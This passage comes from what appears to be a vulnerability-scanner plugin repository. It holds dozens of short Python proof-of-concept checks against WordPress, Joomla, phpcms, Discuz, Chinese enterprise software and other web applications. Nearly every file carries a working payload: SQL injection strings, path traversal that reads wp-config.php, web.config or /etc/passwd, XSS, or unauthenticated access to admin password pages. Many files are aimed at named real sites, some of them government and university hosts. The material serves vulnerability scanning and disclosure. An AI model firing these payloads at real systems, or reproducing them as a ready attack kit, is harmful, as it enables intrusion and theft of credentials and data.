18 |     audit(assign('wordpress','http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/843.py:
--------------------------------------------------------------------------------
 1 | # !/usr/bin/dev python
 2 | # -*- coding:utf-8 -*-
 3 | #__Author__ = DWBH
 4 | # __refer__  = https://www.exploit-db.com/exploits/37244/
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "wordpress":  
 8 |         return True, arg
 9 |     
10 | def audit(arg):
11 |     payload='wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
12 |     target=arg+payload
13 |     code, head, res, ecode, redirect_url =curl.curl(target)
14 |     if code == 200 and 'DB_PASSWORD' in res:
15 |        security_hole(target)
16 |        
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('wordpress', 'http://localhost/wordpress/')[1])
20 | 


--------------------------------------------------------------------------------
/plugins/yongyou_fe/1909.py:
--------------------------------------------------------------------------------
 1 | #/usr/bin/python
 2 | #-*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "yongyou_fe":
 6 |         return True, arg 	
 7 | 
 8 | def audit(arg):
 9 |     url = arg + "mas/schedule.jsp?type=group&SGPID=1%27+UNION+ALL+SELECT+1,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%273.14%27)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--"
10 |     code, head, body, errcode, _url = curl.curl2(url)
11 |     if code == 200 and '0x4beed3b9c4a886067de0e3a094246f78' in body: 
12 |         security_hole(url)
13 | 			
14 |     
15 |     
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('yongyou_fe', 'http://119.145.194.122:9090/')[1])


--------------------------------------------------------------------------------
/plugins/kinggate/2021.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #info:http://www.wooyun.org/bugs/wooyun-2010-0135128
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == "kinggate":
 7 |         arr = urlparse.urlparse(arg)
 8 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     url = arg + 'src/system/default.php'
12 |     postdata = "IG_type=IG_backup"
13 |     code, head, res, errcode, _ = curl.curl2(url,post=postdata)
14 |     if code==200 and 'config network' in res:
15 |         security_hole(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('kinggate', 'https://202.103.238.229/')[1])


--------------------------------------------------------------------------------
/plugins/kingosoft_xsweb/1289.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #ref http://wooyun.org/bugs/wooyun-2010-087296
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "kingosoft_xsweb":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'pub/temp.aspx?type=menu&nj=wooyun%27%20union%20all%20select%201,db_name(1)--'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and 'master' in res :
16 |         security_hole(url)
17 |                         
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('kingosoft_xsweb', 'http://stu.gxufe.cn/xsweb/')[1])


--------------------------------------------------------------------------------
/plugins/lianbangsoft/2659.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #行政审批系统一处系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0126218
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "lianbangsoft":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'workplate/xzsp/kqgl/kqsz/kqsz.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'tbAmSignOff1' in res:
17 |         security_info(verify_url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('lianbangsoft','http://www.sdwlxzfw.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/284.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # coding=utf-8
 3 | # refer: http://www.exploit-db.com/exploits/17704/
 4 | #__author__ = 'Tiny'
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "wordpress":
 9 |         return True, arg
10 | def audit(args):
11 |     payload = '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
12 |     verify_url = args + payload
13 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
14 |     if code==200 and 'DB_PASSWORD' in content:
15 |         security_warning(verify_url)
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('wordpress', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/xtcms/2727.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:SiteFactory CMS 5.5.9任意文件下载漏洞
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-062598
 6 | 
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="xtcms":
10 |         return True,arg 
11 | 
12 | 
13 | def  audit(arg):
14 |     
15 |     url=arg+"manage/download.aspx?File=../web.config"
16 |     code,head,res,errcode,_=curl.curl2(url)
17 |     if code==200 and "connectionString" in res:
18 |         security_hole(url)
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('xtcms','http://jyj.nanyue.gov.cn/ylxx/')[1])
22 |     audit(assign('xtcms','http://czfls.czedu.com.cn/web/')[1])


--------------------------------------------------------------------------------
/plugins/yongyou_crm/2595.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:用友CRM系统任意文件读取
 5 | #Refer:http://wooyun.org/bugs/wooyun-2015-0137503
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="yongyou_crm":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
12 |     url=arg+"ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==200 and "patch" in res:
15 |         security_hole(url)
16 |     
17 | 
18 | if __name__=="__main__":
19 |     from dummy import *
20 |     audit(assign('yongyou_crm','http://112.64.196.14/')[1])
21 |     audit(assign('yongyou_crm','http://www.kdlian.com:8001/')[1])


--------------------------------------------------------------------------------
/plugins/zhongruan_firewall/1999.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #info:http://www.wooyun.org/bugs/wooyun-2015-0129555
 4 | import urlparse
 5 | def assign(service, arg):
 6 |     if service == 'zhongruan_firewall':
 7 |         arr = urlparse.urlparse(arg)
 8 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
 9 | 
10 | def audit(arg):
11 |     url = arg + 'definition/temp/user.txt'
12 |     code, head, res, errcode, _ = curl.curl2(url)
13 |     if code==200 and 'admin;' in res:
14 |         security_hole("中软HuaTech-2000硬件防火墙账号密码：%s"%url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('zhongruan_firewall', 'https://120.194.4.130/')[1])


--------------------------------------------------------------------------------
/plugins/kingdee_eas/2581.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:金蝶EAS任意文件读取
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-096179
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="kingdee_eas":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
12 |     url=arg+"portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==200 and "bin/bash" in res:
15 |         security_hole(url)
16 |     
17 | if __name__=="__main__":
18 |     from dummy import *
19 |     audit(assign('kingdee_eas','http://easshow.kingdee.com:7896/')[1])


--------------------------------------------------------------------------------
/plugins/metinfo/2824.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:MetInfo 5.1.7 LFI 漏洞
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-0159386
 5 | #Author:烽火戏诸侯
 6 | 
 7 | def assign(service, arg):
 8 |     if service == 'metinfo':
 9 |         return True, arg
10 |     
11 | def audit(arg):
12 |     target =arg+'index.php?index=a&skin=&dataoptimize_html=/../../../robots.txt'
13 |     
14 |     code, head, res, errcode, _ = curl.curl2(target) 
15 |     if code == 200 and ('Disallow:' in res and 'User-agent:' in res):
16 |         security_hole(target)
17 |     
18 |         
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('metinfo','http://www.xjyrt.com/')[1])


--------------------------------------------------------------------------------
/plugins/phpweb/1494.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # http://www.wooyun.org/bugs/wooyun-2010-046528
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "phpweb":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg+'regxy.php?membertypeid=-9914%27%20UNION%20ALL%20SELECT%2018%2C18%2C18%2C18%2C18%2CCONCAT%280x716b786271%2CIFNULL%28CAST%28md5%283.1415%29%20AS%20CHAR%29%2C0x20%29%2C0x717a626a71%29%2C18%2C18%2C18%2C18%23'
10 |     code, _, res, _, _ = curl.curl2(url)
11 |     if code == 200 and "63e1f04640e83605c1d177544a5a0488" in res:
12 |         security_hole(url)
13 | 
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('phpweb', 'http://www.wlcdc.com/')[1])


--------------------------------------------------------------------------------
/plugins/pkpmbs/2550.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:政府建设工程质量监督系统可修改任意会员密码等其他信息
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-0121058
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="pkpmbs":
 9 |         return True,arg 
10 |     
11 | def  audit(arg):
12 |     url=arg+"pkpmbs/manager/sysuserlist.aspx"
13 |     code,head,res,errcode,_=curl.curl2(url)
14 |     if code==200 and  "javascript:role(" in res and 'javascript:changepwd(' in res:   
15 |         security_hole(url)
16 |     
17 | if __name__=="__main__":
18 |     from dummy import *
19 |     audit(assign('pkpmbs','http://www.thszjz.com/')[1])
20 |     audit(assign('pkpmbs','http://www.ccjdw.com/')[1])


--------------------------------------------------------------------------------
/plugins/qibocms/1755.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:这个程序员不太冷
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2014-055842
 5 | import re
 6 | def assign(service, arg):
 7 |     if service == "qibocms":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload="download/s_rpc.php"
12 |     data="queryString=aa%df'%20union%20select%20md5(1234)%23"
13 |     url=arg+payload
14 |     code, head, res, errcode, _ = curl.curl2(url,data)
15 |     if code==200 and "81dc9bdb52d04dc20036dbd8313ed055" in res:
16 |         security_hole(url)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('qibocms','http://127.0.0.1:8080/qibocms_down/')[1])


--------------------------------------------------------------------------------
/plugins/sitefactory/1359.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = ali
 4 | #_FileName_ = SiteFactory CMS 5.5.9.py
 5 | #https://www.bugscan.net/#!/x/22441
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "sitefactory":
 9 |         return True, arg
10 |     
11 | def audit(arg):
12 |     payload = 'sitefactory/assets/download.aspx?file=c%3a\windows\win.ini'
13 |     target = arg + payload
14 |     code,head,body,_,_ = curl.curl2(target)
15 |     if code == 200 and '[mci extensions]' in body:
16 |         security_hole(arg)
17 |     
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('sitefactory', 'http://www.astridlindgrenshembygd.se/')[1])


--------------------------------------------------------------------------------
/plugins/suntown_pm/2685.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:浙大升腾软件开发的数字房产系统越权访问可以getshell
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-063656
 6 | 
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="suntown_pm":
10 |         return True,arg 
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"admini/upfile/upfile.aspx"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and 'PageA_name' in res and 'PageA_per' in res:
17 |             security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('suntown_pm','http://web.jafdc.cn/')[1])
22 |     audit(assign('suntown_pm','http://www.tgfgj.com/')[1])


--------------------------------------------------------------------------------
/plugins/tianbo_train/2044.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:小光
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2015-0143143
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "tianbo_train":
 8 |         return True, arg
 9 |              
10 | def audit(arg): 
11 |     payload = 'Web_Org/TCH_list.aspx?typeid=-1'
12 |     url = arg + payload
13 |     code, head, res, errcode, _ = curl.curl2(url+'%20and%201%3Ddb_name%281%29--')
14 |     if code == 500 and 'master' in res :
15 |         security_hole(arg+payload+'   :found sql Injection')
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('tianbo_train','http://www.fenghuaedu.net/')[1])


--------------------------------------------------------------------------------
/plugins/workyi_system/1582.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #title:workyi_Talent system SQL injection
 4 | #author: POX_HT
 5 | #ref: http://www.wooyun.org/bugs/wooyun-2010-0116453
 6 | 
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "workyi_system":
10 |         return True, arg
11 | 
12 | 
13 | def audit(arg):
14 |     payload = "hrtool/Default.aspx?PID=convert(int,%27tes%27%2b%27tvul%27)"
15 |     url = arg + payload
16 |     code, head,res, errcode, _url = curl.curl(url)
17 |     if code==500 and 'testvul' in res:
18 |         security_hole(url)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('workyi_system', 'http://www.tjkyhr.com/')[1])


--------------------------------------------------------------------------------
/plugins/esccms/2613.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:易创思ECScms 一处注入(不是同一注入点)
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2010-088844
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="esccms":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"MoreIndex.aspx?pkId=0&kw=a%27%20And%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27)))--&st=2&t=1"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==500 and "c4ca4238a0b923820dcc509a6f75849b" in res:
17 |         security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('esccms','http://www.zjhzyg.net/')[1])


--------------------------------------------------------------------------------
/plugins/joomla/2730.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = Mr.R
 4 | #_PlugName_ = Joomla com_docman 任意文件下载
 5 | #__Refer___ = https://www.bugscan.net/#!/x/1189
 6 | 
 7 | 
 8 | def assign(service, arg):
 9 |     if service == 'joomla':
10 |         return True, arg
11 | 
12 | 
13 | def audit(arg):
14 |     payload = 'components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA='
15 |     target = arg + payload
16 | 
17 |     code, head, res, errcode, _ = curl.curl2(target)
18 |     if code == 200 and "<?php" in res:
19 |         security_note(target)
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('joomla', 'http://www.elcalero.com/mb/')[1])


--------------------------------------------------------------------------------
/plugins/lianbangsoft/2661.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #行政审批系统一处系统越权
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0126218
 5 | #__author__ = 'xq17'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "lianbangsoft":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'workplate/base/operation/add.aspx'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl2(verify_url)
16 |     if code == 200 and 'SQL' in res and 'tbDescr' in res:
17 |         security_info(verify_url)
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('lianbangsoft','http://www.sdwlxzfw.gov.cn/')[1])


--------------------------------------------------------------------------------
/plugins/phpcms/483.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #by lkz
 4 | #refer:http://www.2cto.com/Article/201207/142839.html
 5 | #phpcms V9任意读文件漏洞
 6 | import re
 7 | 
 8 | def assign(service, arg):
 9 |     if service == "phpcms":
10 |         return True, arg
11 | 
12 | def audit(arg):
13 |     payload = "/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/version.php"
14 |     url = arg + payload
15 |     code, head, res, errcode, _ = curl.curl(url)
16 |     m = re.search('pc_release',res)
17 |     if m:
18 |         security_hole(url)
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('phpcms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/shopbuilder/502.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = Tian.Te
 4 | #ShopBuilder /?m=product&s=list&ptype SQL注入
 5 | def assign(service,arg):
 6 |     if service == "shopbuilder":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload ="?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%28123%29%29,1%29%23"
11 |     url = arg + payload
12 |     code, head, res, errcode,finalurl =  curl.curl('"%s"' % url)
13 | 
14 |     if code == 200 and '202cb962ac59075b964b07152d234b7' in res:
15 |         security_hole(url)
16 | 
17 | if __name__ == "__main__":
18 |     from dummy import *
19 |     audit(assign('shopbuilder', 'http://www.eseein.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/779.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = DWBH
 4 | # __type__  = WordPress Simple Backup Plugin Arbitrary Download
 5 | 
 6 | import re
 7 | def assign(service, arg):
 8 |     if service == "wordpress":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     payload = "/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php"
13 |     url = arg + payload
14 |     code, head, res, _, _ = curl.curl(url)
15 |     if code == 200 and res.find('DB_PASSWORD') != -1:
16 |         security_hole(url)
17 |     
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('wordpress', 'localhost/wordpress')[1])
21 | 
22 | 
23 | 


--------------------------------------------------------------------------------
/plugins/dalianqianhao/1258.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 01001000entai
 4 | #_PlugName_ = qianhao .ini
 5 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2010-063453
 6 | 
 7 | import re
 8 | 
 9 | def assign(service, arg):
10 | 	if service == 'dalianqianhao':
11 | 		return True, arg
12 | 
13 | def audit(arg):
14 |     payload = 'QHDBCONFIG.INI'
15 |     target = arg + payload
16 |     code, head, body, errcode, final_url = curl.curl2(target);
17 |     if code == 200 and 'DB_USERNAME=' in body:
18 |         security_hole(target)
19 | 
20 | if __name__ == '__main__':
21 | 	from dummy import *
22 | 	audit(assign('dalianqianhao', 'http://cityjw.dlut.edu.cn:7001/')[1])                


--------------------------------------------------------------------------------
/plugins/es-cloud/1279.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:小光
 4 | #refer:http://www.wooyun.org/bugs/wooyun-2010-099533
 5 | 
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "es-cloud":
 9 |         return True, arg 	
10 | 
11 | def audit(arg):
12 |     payload = 'Easy/AppNew/GuideList.aspx?AppId='
13 |     getdata = 'db_name%281%29'
14 |     url = arg + payload + getdata
15 |     code, head, res, errcode, _url = curl.curl2(url)
16 |     if code == 500 and 'master' in res:
17 |         security_hole(url + "   :found sql Injection")
18 | 			
19 |     
20 |     
21 | if __name__ == '__main__':
22 |     from dummy import *
23 |     audit(assign('es-cloud', 'http://521gx.com/')[1])
24 | 


--------------------------------------------------------------------------------
/plugins/eyou/2578.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | 
 4 | #Author:404
 5 | #Name:eYou邮件系统问题搜索功能SQL注射漏洞
 6 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-074260
 7 | 
 8 | def assign(service,arg):
 9 |     if service=="eyou":
10 |         return True,arg 
11 |     
12 | 
13 | def  audit(arg):
14 |     
15 |     url=arg+"user/?q=help&type=search&page=1&kw=-1%22)%20UNION%20ALL%20SELECT%201,2,3,concat(0x7c,MD5(1)),5,6,7%23"
16 |     code,head,res,errcode,_=curl.curl2(url)
17 |     if code==200 and "c4ca4238a0b923820dcc509a6f75849b" in res:
18 |         security_hole(url)
19 |        
20 | 
21 | if __name__=="__main__":
22 |     from dummy import *
23 |     audit(assign('eyou','http://mail.ecu.com.cn/')[1])


--------------------------------------------------------------------------------
/plugins/phpb2b/2097.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name: PHPB2B某处漏洞直接查看mysql密码
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2015-090306
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "phpb2b":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "install/install.php?step=5&app_lang=zh-cn&do=complete"
12 |     code, head, res, errcode, _ = curl.curl2(payload)
13 |     if code ==200 and 'name="dbname"' in res and 'name="dbhost"' in res:
14 |          security_info(payload+':Infromation Traversal dbw =value' )
15 |          
16 | if __name__ == '__main__':
17 |         from dummy import *
18 |         audit(assign('phpb2b', 'http://en.csjci.com/')[1])


--------------------------------------------------------------------------------
/plugins/phpmps/481.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service,arg):
 5 |     if service == "phpmps":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 | 	payload = "/search.php?custom[xss%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(md5(3.14),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1"
10 | 	code, head, res, errcode,finalurl =  curl.curl("\"%s\"" % (arg + payload))
11 | 
12 | 	if code == 200:
13 | 		if "for key 'group_key'" in res:
14 | 			security_hole('find sql injection: ' + arg+'search.php')
15 | 
16 | if __name__ == "__main__":
17 | 	from dummy import *
18 | 	audit(assign('phpmps', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/trs_wcm/2231.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 烽火戏诸侯
 4 | #_PlugName_ = TRS WCM 获取取管理员密码
 5 | import re
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "trs_wcm":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     payload = 'wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin'
13 |     target = arg + payload
14 |     code, head,res, errcode, _   = curl.curl2(target)
15 |     if code==200 and '<USERNAME>' in res and '<PASSWORD>' in res:
16 |           
17 |         security_hole(target)
18 |         
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('trs_wcm', 'http://en.ccccltd.cn/')[1])


--------------------------------------------------------------------------------
/plugins/urp/263.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #URP教务系统越权查询漏洞(需登录)
 4 | #存在文件：/test1.jsp(成绩查询文件：/jmglAction.do?oper=xsmdcx)
 5 | #__author__ = 'range'
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "urp":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg
13 |     payload = 'test1.jsp'
14 |     verify_url = url +  payload
15 |     code, head, res, errcode, _ = curl.curl(verify_url)
16 |     if code == 200:
17 |         security_info(verify_url)
18 |         security_info(url + 'jmglAction.do?oper=xsmdcx(This url need to login in)')
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('urp', 'http://www.example.com/')[1])
23 | 


--------------------------------------------------------------------------------
/plugins/wordpress/1417.py:
--------------------------------------------------------------------------------
 1 | # !/usr/bin/dev python
 2 | # -*- coding:utf-8 -*-
 3 | #__Author__ = buliuchang
 4 | # __refer__  = https://www.exploit-db.com/exploits/37244/
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "wordpress":  
 8 |         return True, arg
 9 |     
10 | def audit(arg):
11 |     payload='wp-content/plugins/wp-symposium/get_album_item.php?size=md5(1);--'
12 |     target=arg+payload
13 |     code, head, res, ecode, redirect_url =curl.curl(target)
14 |     if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
15 |        security_hole(target)
16 |        
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('wordpress', 'http://localhost/wordpress/')[1])
20 | 


--------------------------------------------------------------------------------
/plugins/wordpress/144.py:
--------------------------------------------------------------------------------
 1 | #Referer:http://sebug.net/vuldb/ssvid-61532
 2 | def assign(service, arg):
 3 |     if service == "wordpress":
 4 |         return True, arg
 5 | 
 6 | def audit(args):
 7 |     payload = "/wp-content/plugins/dzs-videogallery/ajax.php?ajax=true&amp;height=400&amp;"
 8 |     payload +="width=610&amp;type=vimeo&amp;source=%22/><script>alert(233)</script>"
 9 |     verify_url = args + payload
10 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
11 |     if code==200 and '<script>alert(233)</script>' in content:
12 |         security_info(verify_url)
13 | 
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('wordpress', 'http://www.example.com/')[1])
17 | 


--------------------------------------------------------------------------------
/plugins/zfsoft/2305.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #_PlugName_ = 正方协同办公系统任意文件下载漏洞
 4 | #__Refer___ = http://www.wooyun.org/bugs/wooyun-2015-0150337
 5 | import re
 6 | def assign(service, arg):
 7 |     if service == 'zfsoft':
 8 |         return True, arg
 9 | def audit(arg):
10 |     payload = 'gwxxbviewhtml.do?theAction=downdoc&gw_title=%00&htwj_recordid=../../../../../../../../../../.././../etc/passwd%00'
11 |     target = arg + payload
12 |     code, head, res, errcode, _ = curl.curl2(target)
13 |     if code == 200 and ':/bin/bash' in res:
14 |         security_info(target)
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('zfsoft', 'http://oa.xzcit.cn/')[1])


--------------------------------------------------------------------------------
/plugins/acsno/2212.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | """
 5 | POC Name  :  埃森诺网络服务质量检测系统 Struts 2命令执行 
 6 | Author    :  a
 7 | mail      :  a@lcx.cc
 8 |  
 9 | 
10 | """
11 | import urlparse
12 |  
13 | 
14 | def assign(service, arg):
15 |     if service == 'acsno':
16 |         arr = urlparse.urlparse(arg)
17 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
18 | def audit(arg):
19 |     param_data = 'usercfg/user_loginUI.do'
20 |     url = arg + param_data
21 |     task_push('struts' ,url)
22 |    
23 | 
24 | if __name__ == '__main__':
25 |     from dummy import *
26 |     audit(assign('acsno', 'http://223.87.12.193/')[1]) #  
27 |     audit(assign('acsno', 'http://60.255.46.54/')[1]) # 台


--------------------------------------------------------------------------------
/plugins/discuz/200.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'K0thony' 
 4 | def assign(service, arg): 
 5 |     if service == "discuz": 
 6 |       return True, arg 
 7 | def audit(arg):
 8 |     payload = 'bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20statistic%20(select%20(select%20md5(12345)%20from%20pre_common_statuser,pre_ucenter_members%20as' 
 9 |     verify_url = arg + payload 
